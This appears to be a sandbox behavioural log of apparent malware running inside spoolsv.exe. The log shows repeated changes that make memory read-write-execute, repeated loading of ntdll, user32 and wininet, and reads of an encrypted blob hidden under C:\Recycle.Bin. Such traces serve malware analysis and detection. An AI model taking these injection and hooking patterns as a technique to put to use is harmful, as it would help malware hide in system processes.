Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: BAF6E20 Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2326148924
Thread created PID: 1496 TID: 3404 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\spoolsv.exe Injected: false success or wait 2326150515
Thread created PID: 1496 TID: 3432 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\spoolsv.exe Injected: false success or wait 2326153344
Thread delayed Time: 0 TID: 13312 success or wait 2326155808
Thread delayed Time: 0 TID: 13312 success or wait 2326156211
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 7C90DF1E Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2326156395
System info queried Type: BasicInformation success or wait 2326156695
System info queried Type: ProcessorInformation success or wait 2326156995
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2326157400
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2326161194
System info queried Type: BasicInformation success or wait 2326162018
System info queried Type: ProcessorInformation success or wait 2326162312
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 7C90DF1E Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2326163543
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: BB10A90 Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2326163851
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 7C90DC5E Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2326164161
System info queried Type: BasicInformation success or wait 2326164457
System info queried Type: ProcessorInformation success or wait 2326164746
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2326165151
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2326168902
System info queried Type: BasicInformation success or wait 2326169716
System info queried Type: ProcessorInformation success or wait 2326170012
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 7C90DC5E Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2326171235
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: BAFF2F8 Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2326171541
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 7C90D2EE Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2326171848
System info queried Type: BasicInformation success or wait 2326172143
System info queried Type: ProcessorInformation success or wait 2326172431
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2326172832
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2326177015
System info queried Type: BasicInformation success or wait 2326177822
System info queried Type: ProcessorInformation success or wait 2326178117
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 7C90D2EE Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2326179349
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: BAFCF58 Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2326179661
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 7C90DB3E Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2326180174
System info queried Type: BasicInformation success or wait 2326180474
System info queried Type: ProcessorInformation success or wait 2326180767
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2326181172
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2326184987
System info queried Type: BasicInformation success or wait 2326185805
System info queried Type: ProcessorInformation success or wait 2326186101
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 7C90DB3E Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2326187329
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: BB10168 Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2326187638
Section loaded Path: \KnownDlls\nspr4.dll Access: write and read and execute Type: unknown Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid object name not found 2326188638
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2326190957
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2326191959
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 7E418BF6 Length: 2000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2326204321
System info queried Type: BasicInformation success or wait 2326204633
System info queried Type: ProcessorInformation success or wait 2326204948
File opened Path: C:\WINDOWS\system32\USER32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2326205365
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 4 Value: D8 00 00 00 success or wait 2326206514
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 20 Value: 4C 01 04 00 1B A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2326207199
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 F4 05 00 00 E2 02 00 00 00 00 00 17 B2 00 00 00 10 00 00 00 B0 05 00 00 00 41 7E 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 10 09 00 00 04 00 00 76 FC 08 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 39 00 00 success or wait 2326207522
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 83 F2 05 00 00 10 00 00 00 F4 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 80 11 00 00 00 10 06 00 00 0C 00 00 00 F8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 88 A0 02 00 00 30 06 00 00 A2 02 00 success or wait 2326208414
Section loaded Path: C:\WINDOWS\system32\user32.dll Access: query and read Type: commit Baseaddress: E30000 Size: 57344 Protection: readonly Mapped to pid: own pid success or wait 2326209407
System info queried Type: BasicInformation success or wait 2326210581
System info queried Type: ProcessorInformation success or wait 2326210889
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 7E418BF6 Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2326212192
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: BAFC210 Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2326212519
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 3D949088 Length: 2000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2326212916
System info queried Type: BasicInformation success or wait 2326213228
System info queried Type: ProcessorInformation success or wait 2326213521
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2326213938
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2326215063
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2326215731
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2326216046
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2326216924
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2326217801
System info queried Type: BasicInformation success or wait 2326218628
System info queried Type: ProcessorInformation success or wait 2326218928
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 3D949088 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2326220612
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: BB10D98 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2326220913
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 3D95EE89 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2326221297
System info queried Type: BasicInformation success or wait 2326221610
System info queried Type: ProcessorInformation success or wait 2326221902
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2326222314
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2326223446
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2326224112
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2326224433
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2326225316
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2326226198
System info queried Type: BasicInformation success or wait 2326227022
System info queried Type: ProcessorInformation success or wait 2326227327
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 3D95EE89 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2326229012
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: BB104E8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2326229318
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 3D94FABE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2326229710
System info queried Type: BasicInformation success or wait 2326230007
System info queried Type: ProcessorInformation success or wait 2326230301
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2326230719
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2326231844
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2326232513
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2326232831
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2326233711
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2326234593
System info queried Type: BasicInformation success or wait 2326235421
System info queried Type: ProcessorInformation success or wait 2326235723
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 3D94FABE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2326237404
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: BAF65C8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2326237709
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 3D9A608E Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2326238438
System info queried Type: BasicInformation success or wait 2326238749
System info queried Type: ProcessorInformation success or wait 2326239043
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2326239457
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2326240573
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2326241241
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2326241557
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2326242434
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2326243313
System info queried Type: BasicInformation success or wait 2326244136
System info queried Type: ProcessorInformation success or wait 2326244437
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 3D9A608E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2326246482
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: BAFF660 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2326246784
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2326247672
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2326249052
Memory attributes changed PID: 1496 Path: C:\WINDOWS\system32\spoolsv.exe Base: 3D94D508 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2326271740
System info queried Type: BasicInformation success or wait 2326272039
System info queried Type: ProcessorInformation success or wait 2326272342
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2326272753
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2326273905
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2326274575
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2326274894
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2326275777
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2326276582
System info queried Type: BasicInformation success or wait 2326276888
System info queried Type: ProcessorInformation success or wait 2326276998
System info queried Type: BasicInformation success or wait 2326277966
System info queried Type: ProcessorInformation success or wait 2326278073
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2326278226
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2326278617
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2326279092
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2326279410
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2326280389
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2326281561
System info queried Type: BasicInformation success or wait 2326282397
System info queried Type: ProcessorInformation success or wait 2326282698
System info queried Type: BasicInformation success or wait 2326970834
System info queried Type: ProcessorInformation success or wait 2326971130
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2326975159
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2326976282
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2326977011
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2326977325
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2326978199
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2326979073
System info queried Type: BasicInformation success or wait 2326979915
System info queried Type: ProcessorInformation success or wait 2326980215
System info queried Type: BasicInformation success or wait 2326983018
System info queried Type: ProcessorInformation success or wait 2326983313
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2326983728
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2326984719
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2326985385
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2326985699
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2326986574
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2326987449
System info queried Type: BasicInformation success or wait 2326988275
System info queried Type: ProcessorInformation success or wait 2326988573
System info queried Type: BasicInformation success or wait 2326991257
System info queried Type: ProcessorInformation success or wait 2326991550
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2326991962
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2326992538
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2326992777
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2326992890
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2326993205
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2326993521
System info queried Type: BasicInformation success or wait 2326993819
System info queried Type: ProcessorInformation success or wait 2326993928
System info queried Type: BasicInformation success or wait 2326995012
System info queried Type: ProcessorInformation success or wait 2326995327
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2326995741
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2326997261
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2326997924
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2326998239
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2326999114
